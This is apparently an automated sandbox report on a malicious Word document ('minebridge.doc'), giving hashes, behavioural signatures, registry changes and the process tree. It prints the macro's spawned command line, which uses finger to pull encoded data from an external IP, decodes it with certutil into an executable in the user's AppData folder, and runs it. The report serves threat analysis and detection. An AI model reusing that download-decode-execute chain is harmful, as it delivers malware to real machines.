Analysis
-
max time kernel
120s -
max time network
119s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
16-01-2021 06:55
Static task
static1
Behavioral task
behavioral1
Sample
321b5dbbc36ac4946955905f9dd4f44b15df30cbfd7d2be1d8b6171c1ee71b67_minebridge.doc
Resource
win7v20201028
Behavioral task
behavioral2
Sample
321b5dbbc36ac4946955905f9dd4f44b15df30cbfd7d2be1d8b6171c1ee71b67_minebridge.doc
Resource
win10v20201028
General
-
Target
321b5dbbc36ac4946955905f9dd4f44b15df30cbfd7d2be1d8b6171c1ee71b67_minebridge.doc
-
Size
118KB
-
MD5
f95643710018c437754b8a11cc943348
-
SHA1
f590e1b6a80cf3e8360388382eabb04b3e247b78
-
SHA256
321b5dbbc36ac4946955905f9dd4f44b15df30cbfd7d2be1d8b6171c1ee71b67
-
SHA512
f39abfd51e62f145376b5587cd515072e01740e10e967f401057c00403017c6754264bed08f8bef819829a80762ce572b40463b7854db33a961ff2e624509fba
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1648 1468 cmd.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Processes:
WINWORD.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 932 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 932 WINWORD.EXE 932 WINWORD.EXE -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
WINWORD.EXEcmd.exedescription pid process target process PID 932 wrote to memory of 1996 932 WINWORD.EXE splwow64.exe PID 932 wrote to memory of 1996 932 WINWORD.EXE splwow64.exe PID 932 wrote to memory of 1996 932 WINWORD.EXE splwow64.exe PID 932 wrote to memory of 1996 932 WINWORD.EXE splwow64.exe PID 1648 wrote to memory of 1060 1648 cmd.exe finger.exe PID 1648 wrote to memory of 1060 1648 cmd.exe finger.exe PID 1648 wrote to memory of 1060 1648 cmd.exe finger.exe PID 1648 wrote to memory of 2020 1648 cmd.exe certutil.exe PID 1648 wrote to memory of 2020 1648 cmd.exe certutil.exe PID 1648 wrote to memory of 2020 1648 cmd.exe certutil.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\321b5dbbc36ac4946955905f9dd4f44b15df30cbfd7d2be1d8b6171c1ee71b67_minebridge.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\system32\cmd.execmd /C finger nc20@184.164.146.102 > %appdata%\vUCooUr >> %appdata%\vUCooUr1 && certutil -decode %appdata%\vUCooUr1 %appdata%\vUCooUr.exe &&cmd /C del %appdata%\vUCooUr1 && %appdata%\vUCooUr.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\finger.exefinger nc20@184.164.146.1022⤵
-
C:\Windows\system32\certutil.execertutil -decode C:\Users\Admin\AppData\Roaming\vUCooUr1 C:\Users\Admin\AppData\Roaming\vUCooUr.exe2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\vUCooUr1MD5
cf1c89f9c31ba34c4a84c26e13f9c6a2
SHA13ffe882b0b0df619e046d6b589438b5652fb9b17
SHA25629d9868db914315b380fa6629d7205fe2c00f8186c4164a08fd30c4fe449793c
SHA5125b1d2c81ac636a9ead6b99fa510ad9a8b604072c9a82a7b3d2e1e6f4c0d82556b4ab1de761fd8f0798b871e8b8f3a4bf7345e9625f11cbfe653857e00dc84aab
-
memory/932-3-0x00000000008F3000-0x00000000008F5000-memory.dmpFilesize
8KB
-
memory/932-4-0x00000000008F5000-0x00000000008F9000-memory.dmpFilesize
16KB
-
memory/1060-5-0x0000000000000000-mapping.dmp
-
memory/1996-2-0x0000000000000000-mapping.dmp
-
memory/2020-6-0x0000000000000000-mapping.dmp